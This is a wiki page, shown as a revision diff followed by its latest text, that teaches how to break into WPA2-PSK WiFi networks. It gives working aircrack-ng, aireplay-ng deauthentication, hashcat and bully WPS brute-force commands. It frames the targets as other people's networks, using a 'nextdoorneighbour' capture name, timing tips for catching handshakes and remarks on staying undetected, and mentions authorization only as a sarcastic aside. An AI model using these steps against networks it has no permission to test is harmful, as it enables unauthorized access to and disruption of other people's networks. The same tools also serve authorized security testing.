hello friends! new(ish)!

Breaking WPA2: Difference between revisions

From InstallGentoo Wiki v2
Jump to navigation Jump to search
>Mrsnooze
(typos, flow)
>Grichka.bogdanoff
(wps attack vector, external links)
 
(10 intermediate revisions by 6 users not shown)
Line 1: Line 1:
= Breaking WPA2 =
Breaking a WiFi network (WPA(2)-PSK) depends on the strength of the[[Passwords | password]].
 
Breaking a WiFi network (WPA(2)-PSK) depends on the strength of the password.
There are plenty of guides on breaking WEP/WPA/WPA2 on the net, but we'll repeat it all here anyway.
There are plenty of guides on breaking WEP/WPA/WPA2 on the net, but we'll repeat it all here anyway.


== Requirements ==
== Requirements ==
* A linux distro (possibly Kali) which you can boot into.
* A linux [[:Category:Distros | distro]] (possibly Kali) which you can boot into.
* A WiFi Card/Dongle which supports Monitor Mode under linux.
* A WiFi Card/Dongle which supports Monitor Mode under [[:Category:GNU/Linux | linux]].
* Proximity to your target network - You'll need a bar or two of Wifi signal to have any fun.
* Proximity to your target [[:Category:Networking | network]] - You'll need a bar or two of Wifi signal to have any fun.
* aircrack-ng - preinstalled in Kali, available in most linux distros.
* [http://aircrack-ng.org/ aircrack-ng] - preinstalled in Kali, available in most linux distros.


== Basic Process ==
== Basic process ==
The basic process of cracking someone's Wifi is:
The basic process of cracking someone's Wifi is:
# Find their network.
# Find their network.
Line 16: Line 14:
# Crack the key.
# Crack the key.


== Finding the Network ==
== Finding the network ==
Your standard WiFi connection softare (netctl, wicd, etc) can tell you what networks are available.
Your standard WiFi connection software (netctl, wicd, etc) can tell you what networks are available.
Alternatively you scan manually:
Alternatively you scan manually:
# iwconfig
{{bc|# iwconfig}}
Find your wifi card. We'll assume it's wlan0.
Find your wifi card. We'll assume it's wlan0.


Turn on the wifi card/dongle
Turn on the wifi card/dongle
# ifconfig wlan0 up
{{bc|# ifconfig wlan0 up}}


List available wifi access points. You may want to pipe this command to less or a file.
List available wifi access points. You may want to pipe this command to less or a file.
# iwlist scan wlan0
{{bc|# iwlist wlan0 scan}}


Look through the output of iwlist to see what networks are around, then take note of the network's channel and mac address.
Look through the output of {{ic|iwlist}} to see what networks are around, then take note of the network's channel and mac address.


== Listen to the Network ==
== Listen to the Network ==
Once you have a target wifi and know it's channel and mac address:
Once you have a target wifi and know it's channel and MAC address:
# airmon-ng start wlan0 <channel>  
{{bc|# airmon-ng start wlan0 <channel>}}


This sets your wifi card to monitor mode and creates the wlan0mon interface which we'll use with the following programs:
This sets your wifi card to monitor mode and creates the wlan0mon interface which we'll use with the following programs:
# airodump -c <channel> --bssid <mac of AP> -w prefix wlan0mon
{{bc|# airodump-ng -c <channel> --bssid <mac of AP> -w prefix wlan0mon}}
The airodump command dumps all the packets it hears into a file, given that
The {{ic|airodump-ng}} command dumps all the packets it hears into a file, given that
* -c is the channel e.g. -c 11
* {{ic|-c}} is the channel e.g. {{ic|-c 11}}
* --bssid is the mac address of the wifi access point e.g. --bssid AA:AA:AA:AA:AA
* {{ic|--bssid}} is the MAC address of the wifi access point e.g. {{ic|--bssid AA:AA:AA:AA:AA}}
* -w is a prefix for the files that airodump will product e.g. -w nextdoorneighbour
* {{ic|-w}} is a prefix for the files that airodump-ng will product e.g. {{ic|-w nextdoorneighbour}}
* wlan0mon is the monitor device we created with airmon-ng start.
* {{ic|wlan0mon}} is the monitor device we created with {{ic|airmon-ng start}}.


== Wait for Client Authentication ==
== Wait for client authentication ==
At this point your Wifi card is listening to every packet sent on the target Wifi network. What we're looking for is the authentication handshake, which is basically a hashed password which we'll attempt to crack once we have it.
At this point your Wifi card is listening to every packet sent on the target Wifi network. What we're looking for is the authentication handshake, which is basically a hashed password which we'll attempt to crack once we have it.
In the top right of the terminal there will be a message about a handshake being read once it happens, and then we can stop listening. This is a client connecting to the target wifi.
In the top right of the terminal there will be a message about a handshake being read once it happens, and then we can stop listening. This is a client connecting to the target wifi.
Think about what kind of network your target is and when people would connect to it - 9am ready for work? 6pm home at last? When will a client connect?
Think about what kind of network your target is and when people would connect to it - 9am ready for work? 6pm home at last? When will a client connect?
Alternatively, we can just kick off a client that's already connected...
Alternatively, we can just kick off a client that's already connected...
Line 50: Line 50:
=== Kicking Off a Client ===
=== Kicking Off a Client ===
If you're impatient, you can attempt to kick a client off the target wifi network. For this, you'll need a client to be connected to the network, and be physically close enough to that client to send some spoofed packets to it.
If you're impatient, you can attempt to kick a client off the target wifi network. For this, you'll need a client to be connected to the network, and be physically close enough to that client to send some spoofed packets to it.
The output of airodump-ng will let you know if there are clients connected to your target network. Checking the <prefix>.kismet.netxml file will give you clues as to what kinds of devices are on the network. Kicking off an Apple device might get someone's attention. Kicking off an Epson printer probably wont.
 
The output of {{ic|airodump-ng}} will let you know if there are clients connected to your target network. Checking the {{ic|<prefix>.kismet.netxml}} file will give you clues as to what kinds of devices are on the network. Kicking off an Apple device might get someone's attention. Kicking off an Epson printer probably wont.
 
To kick someone off their wifi network, send them a DEAUTH packet:
To kick someone off their wifi network, send them a DEAUTH packet:
# aireplay-ng -0 1 -a <mac of AP> -c <mac of client> wlan0mon
{{bc|# aireplay-ng -0 1 -a <mac of AP> -c <mac of client> wlan0mon}}
* -0 is to send the deauth packet
* {{ic|-0}} is to send the deauth packet
* 1 is to send it once.
* {{ic|1}} is to send it once.
* -a is the mac address of the access point
* {{ic|-a}} is the mac address of the access point
* -c is the mac address of the client connected to the access point
* {{ic|-c}} is the mac address of the client connected to the access point
* wlan0mon is the interface we created earlier
* {{ic|wlan0mon}} is the interface created earlier
If you're close enough to the client device for them to hear you, this will kick them off the network. They will probably try to automatically reconnect. This gives us the handshake we're after.
If you're close enough to the client device for them to hear you, this will kick them off the network. They will probably try to automatically reconnect. This gives us the handshake we're after.
The aireplay-ng command will let you know how many ACKs (acknowledgements of your packets) were received. If you get no acknowledgements, you're probably too far away from the network and need to get physically closer.


== Cracking the Handshake ==
The {{ic|aireplay-ng}} command will let you know how many ACKs (acknowledgements of your packets) were received. If you get no acknowledgements, you're probably too far away from the network and need to get physically closer.
With the handshake acquired, we can crack it. This is done offline and (unless you kicked someone off their Wifi) at this point all you have done is listen to the airwaves and are completely undetectable.
 
== Cracking the handshake ==
With the handshake acquired, you can crack it. This is done offline and (unless you kicked someone off their Wifi) at this point all you have done is listen to the airwaves and are completely undetectable.


=== Cracking with aircrack-ng ===
=== Cracking with aircrack-ng ===
To crack the handshake with aircrack-ng (cpu) run:
To crack the handshake with {{ic|aircrack-ng}} (cpu) run:
# aircrack-ng -w <wordlist> -b <mac of AP> prefix*.cap
{{bc|# aircrack-ng -w <wordlist> -b <mac of AP> prefix*.cap}}
Where
Where
* -w points to a wordlist/dictionary. Kali has several available, run a webssearch for more.
* {{ic|-w}} points to a wordlist/dictionary. Kali has several available, run a web search for more.
* -b if the mac address of the access point
* {{ic|-b}} if the mac address of the access point
* prefix*.cap is a file we created with airodump-ng.
* {{ic|prefix*.cap}} is a file we created with {{ic|airodump-ng}}.
This will attempt to crack the handshake with the cpu. Quite slow. An i7 may get 4000 tries a second.
This will attempt to crack the handshake with the cpu. Quite slow. An i7 may get 4000 tries a second.


Line 77: Line 80:
oclHashcat will use an AMD GPU.
oclHashcat will use an AMD GPU.
Hashcat uses a different filetype than aircrack-ng (.hccap instead of .cap). So the first step is to convert your .cap file to the hashcat format:
Hashcat uses a different filetype than aircrack-ng (.hccap instead of .cap). So the first step is to convert your .cap file to the hashcat format:
# wpaclean cleanprefix.cap prefix.cap
{{bc|# wpaclean cleanprefix.cap prefix.cap
# aircrack-ng cleanprefix.cap hashcatprefix
# aircrack-ng cleanprefix.cap hashcatprefix}}
This will create hashcatprefix.hccap.
This will create {{ic|hashcatprefix.hccap}}.


# cudaHastcat -m 2500 hashcatprefix.hccap wordlist
{{bc|# cudaHastcat -m 2500 hashcatprefix.hccap wordlist}}
* -m 2500 is for cracking WPA/WPA2 hashes.
* {{ic|-m 2500}} is for cracking WPA/WPA2 hashes.
* hashcatprefix.hccap is the wpa handshake in hashcat format.
* {{ic|hashcatprefix.hccap}} is the wpa handshake in hashcat format.
* wordlist is the wordlist you're using to crack the password
* {{ic|wordlist}} is the wordlist you're using to crack the password


There is also
There is also
# cudaHastcat -m 2500 hashcatprefix.hccap wordlist -r /opt/cudaHashcat/rules/best64.rule
{{bc|# cudaHastcat -m 2500 hashcatprefix.hccap wordlist -r /opt/cudaHashcat/rules/best64.rule}}
* Will apply the best64.rule rules files to your wordlist. Will take much longer but may give you success.
* Will apply the {{ic|best64.rule}} rules files to your wordlist. Will take much longer but may give you success.
 
== Attacking WPS ==
Wi-Fi Protected setup is a smart and easy protocol for connecting new devices to an AP.
 
Basically, there are two main connection modes: one that requires you to push a button on your router and one that doesn't.
 
The second one can be exploited to bruteforce your AP's WPA-PSK in hours, if your AP won't bother to WPS-lock itself after a few tries.
There is also [https://github.com/wiire-a/pixiewps pixie-wps] exploit which grants you the key in seconds on vulnerable devices (e.g. some ASUS or TP-LINK ones).
 
=== The basic attack algorithm ===
Two main tools are present for the job, the classic [https://code.google.com/archive/p/reaver-wps/ reaver] and the newer somewhat improved [https://github.com/aanarchyy/bully bully].
The cool but lazy kids could also use an interactive script like [https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux airgeddon].
 
# [[#Listen to the Network]]
# Kindly ask the target for the key:
#* {{ic|# bully --essid Kremlin --pixiewps wlan0mon}}
# Bruteforce it if it won't comply:
#* {{ic|# bully --essid Kremlin --bruteforce wlan0mon}}
 
Beware that you are not just listening for packets and then picking hashes offline peacefully. It is a direct attack and your MAC is visible to anybody curious enough. But you're only testing your home network, right?
 
== Common Aircrack Problems ==
# {{ic|airmon-ng}} start complains about processes that are using my wifi card.
#* Run {{ic|# airmon-ng check kill}}
# {{ic|airmon-ng}} complains about soft blocking/rfkill.
#* Run {{ic|# rfkill unblock all}}
 
== External links ==
[https://www.aircrack-ng.org/doku.php?id=tutorial The good stuff] you should look into.


= Common Aircrack Problems =
[https://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/ The WPS question]
# airmon-ng start complains about processes that are using my wifi card.
#* Run # airmon-ng check kill
# airmon-ng complains about soft blocking/rfkill.
#* Run # rfkill unblock all


[[Security]]
[[Category:Security]]
[[Category:Networking]]
[[Category:HowTo]]
[[Category:Tutorials]]

Latest revision as of 18:09, 17 May 2021

Breaking a WiFi network (WPA(2)-PSK) depends on the strength of the password. There are plenty of guides on breaking WEP/WPA/WPA2 on the net, but we'll repeat it all here anyway.

Requirements

  • A linux distro (possibly Kali) which you can boot into.
  • A WiFi Card/Dongle which supports Monitor Mode under linux.
  • Proximity to your target network - You'll need a bar or two of Wifi signal to have any fun.
  • aircrack-ng - preinstalled in Kali, available in most linux distros.

Basic process

The basic process of cracking someone's Wifi is:

  1. Find their network.
  2. Listen for a client to connect to the network.
  3. Crack the key.

Finding the network

Your standard WiFi connection software (netctl, wicd, etc) can tell you what networks are available. Alternatively you scan manually:

# iwconfig

Find your wifi card. We'll assume it's wlan0.

Turn on the wifi card/dongle

# ifconfig wlan0 up

List available wifi access points. You may want to pipe this command to less or a file.

# iwlist wlan0 scan

Look through the output of iwlist to see what networks are around, then take note of the network's channel and mac address.

Listen to the Network

Once you have a target wifi and know it's channel and MAC address:

# airmon-ng start wlan0 <channel>

This sets your wifi card to monitor mode and creates the wlan0mon interface which we'll use with the following programs:

# airodump-ng -c <channel> --bssid <mac of AP> -w prefix wlan0mon

The airodump-ng command dumps all the packets it hears into a file, given that

  • -c is the channel e.g. -c 11
  • --bssid is the MAC address of the wifi access point e.g. --bssid AA:AA:AA:AA:AA
  • -w is a prefix for the files that airodump-ng will product e.g. -w nextdoorneighbour
  • wlan0mon is the monitor device we created with airmon-ng start.

Wait for client authentication

At this point your Wifi card is listening to every packet sent on the target Wifi network. What we're looking for is the authentication handshake, which is basically a hashed password which we'll attempt to crack once we have it.

In the top right of the terminal there will be a message about a handshake being read once it happens, and then we can stop listening. This is a client connecting to the target wifi.

Think about what kind of network your target is and when people would connect to it - 9am ready for work? 6pm home at last? When will a client connect? Alternatively, we can just kick off a client that's already connected...

Kicking Off a Client

If you're impatient, you can attempt to kick a client off the target wifi network. For this, you'll need a client to be connected to the network, and be physically close enough to that client to send some spoofed packets to it.

The output of airodump-ng will let you know if there are clients connected to your target network. Checking the <prefix>.kismet.netxml file will give you clues as to what kinds of devices are on the network. Kicking off an Apple device might get someone's attention. Kicking off an Epson printer probably wont.

To kick someone off their wifi network, send them a DEAUTH packet:

# aireplay-ng -0 1 -a <mac of AP> -c <mac of client> wlan0mon
  • -0 is to send the deauth packet
  • 1 is to send it once.
  • -a is the mac address of the access point
  • -c is the mac address of the client connected to the access point
  • wlan0mon is the interface created earlier

If you're close enough to the client device for them to hear you, this will kick them off the network. They will probably try to automatically reconnect. This gives us the handshake we're after.

The aireplay-ng command will let you know how many ACKs (acknowledgements of your packets) were received. If you get no acknowledgements, you're probably too far away from the network and need to get physically closer.

Cracking the handshake

With the handshake acquired, you can crack it. This is done offline and (unless you kicked someone off their Wifi) at this point all you have done is listen to the airwaves and are completely undetectable.

Cracking with aircrack-ng

To crack the handshake with aircrack-ng (cpu) run:

# aircrack-ng -w <wordlist> -b <mac of AP> prefix*.cap

Where

  • -w points to a wordlist/dictionary. Kali has several available, run a web search for more.
  • -b if the mac address of the access point
  • prefix*.cap is a file we created with airodump-ng.

This will attempt to crack the handshake with the cpu. Quite slow. An i7 may get 4000 tries a second.

Cracking with cudaHashcat

cudaHastcat is a version of the hashcat password cracker which uses an nvidia GPU instead of a cpu. A gtx970 will get 160,000 tries a second. oclHashcat will use an AMD GPU. Hashcat uses a different filetype than aircrack-ng (.hccap instead of .cap). So the first step is to convert your .cap file to the hashcat format:

# wpaclean cleanprefix.cap prefix.cap
# aircrack-ng cleanprefix.cap hashcatprefix

This will create hashcatprefix.hccap.

# cudaHastcat -m 2500 hashcatprefix.hccap wordlist
  • -m 2500 is for cracking WPA/WPA2 hashes.
  • hashcatprefix.hccap is the wpa handshake in hashcat format.
  • wordlist is the wordlist you're using to crack the password

There is also

# cudaHastcat -m 2500 hashcatprefix.hccap wordlist -r /opt/cudaHashcat/rules/best64.rule
  • Will apply the best64.rule rules files to your wordlist. Will take much longer but may give you success.

Attacking WPS

Wi-Fi Protected setup is a smart and easy protocol for connecting new devices to an AP.

Basically, there are two main connection modes: one that requires you to push a button on your router and one that doesn't.

The second one can be exploited to bruteforce your AP's WPA-PSK in hours, if your AP won't bother to WPS-lock itself after a few tries. There is also pixie-wps exploit which grants you the key in seconds on vulnerable devices (e.g. some ASUS or TP-LINK ones).

The basic attack algorithm

Two main tools are present for the job, the classic reaver and the newer somewhat improved bully. The cool but lazy kids could also use an interactive script like airgeddon.

  1. #Listen to the Network
  2. Kindly ask the target for the key:
    • # bully --essid Kremlin --pixiewps wlan0mon
  3. Bruteforce it if it won't comply:
    • # bully --essid Kremlin --bruteforce wlan0mon

Beware that you are not just listening for packets and then picking hashes offline peacefully. It is a direct attack and your MAC is visible to anybody curious enough. But you're only testing your home network, right?

Common Aircrack Problems

  1. airmon-ng start complains about processes that are using my wifi card.
    • Run # airmon-ng check kill
  2. airmon-ng complains about soft blocking/rfkill.
    • Run # rfkill unblock all

External links

The good stuff you should look into.

The WPS question